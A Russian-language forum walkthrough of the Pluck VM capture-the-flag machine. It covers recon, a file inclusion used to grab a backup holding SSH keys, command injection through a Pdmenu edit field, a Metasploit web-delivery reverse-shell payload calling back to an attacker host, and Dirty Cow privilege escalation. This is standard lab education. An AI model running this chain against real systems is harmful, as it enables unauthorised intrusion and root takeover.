ANTICHAT - CTF. Hack the Pluck VM.

Привет! В этой статье речь пойдет о CTF - Capture the Flag — это хакерские соревнования. На форуме есть несколько статей подобной тематики, поэтому, я не буду заострять внимание на подробностях, а сразу перейду к делу. Сегодня в качестве уязвимой системы я буду использовать Pluck VM.

https://forum.antichat.xyz/attachmen...b6060e007e.png

Скачать уязвимую VM можно отсюда - https://download.vulnhub.com/pluck/

Монтируем образ в VM Ware и запускаем. Теперь необходимо выяснить адрес VM в нашей сети:

> netdiscover – r 172.16.0.1/16

https://forum.antichat.xyz/attachmen...c48b6bfcb8.png

Я выделил желтым ее адрес в моей локальной сети. Запустим сканирование портов:

> nmap –p- -A 172.16.0.163

https://forum.antichat.xyz/attachmen...5859a11329.png

На данном этапе сканирования, интерес представляет открытый 80 порт и запущенный на нем Apache, к нему присмотримся внимательней, с помощью nikto:

> nikto –hhttp://172.16.0.163

https://forum.antichat.xyz/attachmen...2626d471e0.png

Здесь внимание привлекает обнаруженная уязвимость, которая позволит просмотреть все файлы на сервере. Воспользуемся этим, поместим данную информацию в адресную строку браузера.

https://forum.antichat.xyz/attachmen...4f646e7ad3.png

Из всего, того, что мы здесь видим, нас больше всего интересует путь к файлу с бэкапом, его и подставим следующим в адресную строку:

https://forum.antichat.xyz/attachmen...ba9eebca14.png

Теперь мы знаем, где хранится архив с бэкапом, и можем его вытащить оттуда с помощью wget:

> wget http://172.16.0.163/index.php?page=/backups/backup.tar

https://forum.antichat.xyz/attachmen...87c88f2e16.png

Естественно следующим шагом будет распаковка архива:

> tar –xvf index.php\?page\=%2Fbackups%2Fbackup.tar

https://forum.antichat.xyz/attachmen...418328f80f.png

Распаковка прошла не совсем удачно, зато мы нашли папку /home и три папки пользователей.

https://forum.antichat.xyz/attachmen...b48da2fc71.png

Во всех папках пусто, кроме /paul, внутри находятся файлы со следующим содержимым:

https://forum.antichat.xyz/attachmen...cb4e5af774.png

Это не что иное, как файлы ключей ssh, перебирая по порядку, мне удалось залогиниться на сервере с помощью 4-го ключа:

https://forum.antichat.xyz/attachmen...1b1be3ae23.png

Встречает нас Pdmenu, для тех кто не в курсе, это такой способ разрешить незнакомому с консолью человеку выполнять какие либо действия на сервере, используя удобное меню, и не заморачиваясь с введением команд. Так оно выглядит:

https://forum.antichat.xyz/attachmen...ca5bf2bbd3.png

На мысль об уязвимости наталкивает пункт в меню – Edit File. Вероятно, с его помощью мы сможем выполнить произвольный код.

Для эксплуатации этой уязвимости будем использовать Web Delivery Exploit представленный в Metasploit Framework:

> msfconsole

> use exploit/multi/script/web_delivery

> set target 1

> set payload php/meterpreter/reverse_tcp

> set lhost 192.168.0.106

> set lport 4444

> set srvport 8081

> exploit

https://forum.antichat.xyz/attachmen...95b68e46a5.png

Выделенную строку копируем в поле изменения файла:

https://forum.antichat.xyz/attachmen...e76c219dfc.png

НО, перед началом строки ставим - ;

Затем жмем enter и выходим из vi, вернувшись на скрин с Metasploit, видим открытую сессию meterpreter:

https://forum.antichat.xyz/attachmen...08ce979629.png

Осмотримся в системе и откроем shell:

https://forum.antichat.xyz/attachmen...07434b1ea7.png

Для повышения привилегий в системе используем эксплоит Dirty Cow, скачиваем его через шелл на уязвимый хост:

> wgethttps://exploit-db.com/download/40616

https://forum.antichat.xyz/attachmen...d932bce847.png

Переименуем сохраненный файл 40616, к примеру, в shell.c и скомпилируем его в исполняемый файл с помощью компилятора gcc и опции –pthread:

> mv 40616 shell.c

> gcc shell.c –o cow –pthread

https://forum.antichat.xyz/attachmen...7f1d2e5bc7.png

Запускаем наш готовый файл:

> ./cow

Перейдем в каталог /root

> cd /root

> ls –a

И возьмем флаг:

> cat flag.txt

https://forum.antichat.xyz/attachmen...8187487d90.png

На этом прохождение Pluck VM закончено. Спасибо за внимание.